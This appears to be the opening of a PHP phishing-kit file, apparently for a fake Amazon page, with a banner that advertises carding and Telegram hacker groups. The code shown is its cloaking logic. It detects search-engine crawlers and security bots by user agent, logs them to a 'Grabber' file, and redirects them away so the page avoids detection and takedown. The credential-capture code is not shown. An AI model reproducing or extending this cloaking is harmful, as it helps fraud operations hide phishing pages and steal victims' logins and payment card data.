<?php

/*
██████╗ ██╗  ██╗███████╗    ██████╗ ███████╗ ██████╗██╗  ██╗ █████╗ ██╗  ██╗     ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗██║  ██║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║ ██╔╝██╔══██╗██║  ██║    ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║███████║█████╗      ██████╔╝█████╗  ██║     █████╔╝ ███████║███████║    ██║     ██║   ██║██║  ██║█████╗  ██║  ██║
██║  ██║██╔══██║██╔══╝      ██╔══██╗██╔══╝  ██║     ██╔═██╗ ██╔══██║██╔══██║    ██║     ██║   ██║██║  ██║██╔══╝  ██║  ██║
██████╔╝██║  ██║███████╗    ██║  ██║███████╗╚██████╗██║  ██╗██║  ██║██║  ██║    ╚██████╗╚██████╔╝██████╔╝███████╗██████╔╝
╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝     ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═════╝ 
 * (🧑‍💻)=>DHE RECKAH BOY BORN DEM<=(🧑‍💻)
 * (🧑‍💻)=>OR THEY DON'T TELL YOU <=(🧑‍💻)
 * (🧑‍💻)=>COMMON CARDING FOR DATOR<=(🧑‍💻)
 * Dhe Reckah Amazon Page (MultiFunc)
 * version 1.0.0
 * REMEMBER:                             
 * Facebook fan page is @DheReckahBoy
 * Twitter  fan page is @DheReckahBoy
 * Insta    fan page is @DheReckahBoy
 * youtube  fan page is @DheReckahBoy
 * Telegram fan page is @DheReckahBoy
 * Copycat all reserved @DheReckahBoys
#############################################
#$            Dhe Reckah Coded             #$
#$                  Says:                  #$ 
We All Know The Dangers Of The Internet Users
#$                    &                    #$
#$           As the Internet Exit          #$ 
#$           The dangers exit too          #$  
#############################################
 ================IF AGREED=================
 ==================THEN====================
=Contact Coder On Telegram @DheReckahCoded
=To Be save Join Our Telegram Group
=   @Dhe_ReckahsHackers_Generation
=To Be Secured Join Our Telegram Channel
=   @Dhe_Reckahs_Hackers_Generation

*/


if(strpos($_SERVER['HTTP_USER_AGENT'], 'google') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'Java') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'FreeBSD') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'Yahoo! Slurp') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'YahooSeeker') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'bingbot') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'crawler')  
		or strpos($_SERVER['HTTP_USER_AGENT'], 'PycURL') 
		or strpos($_SERVER['HTTP_USER_AGENT'], 'facebookexternalhit') !== false) {
			$message = "Dh3 R3ck4h D3cl!n3d =>".$_SERVER['HTTP_USER_AGENT']." [ S0m3B0ts ] \r\n";
		    $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
		    fwrite($save,$message);
		    fclose($save);
			header("Location: ".redirectBot());exit();
	}
	$v_agent = $_SERVER['HTTP_USER_AGENT'];
	if($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" || $v_agent == "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)") {
			$message = ("Dh3 R3ck4h D3cl!n3d => ".$_SERVER['HTTP_USER_AGENT']." [ D!sc0v3rdB0t ] \n || !p: ". $ip." || D4t3:".gmdate ("d M,Y")." T!m3:".gmdate ("g:i a")."\n\n");
		    $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
		    fwrite($save,$message);
		    fclose($save);
			header("Location: ".redirectBot());exit();


	}
if ($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {
	$message = ("Dh3 R3ck4h D3cl!n3d => ".$_SERVER['HTTP_USER_AGENT']." [ D!sc0v3rdB0t ] \n || !p: ". $ip." || D4t3:".gmdate ("d M,Y")." T!m3:".gmdate ("g:i a")."\n\n");
		    $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
		    fwrite($save,$message);
		    fclose($save);
			header("Location: ".redirectBot());exit();
}



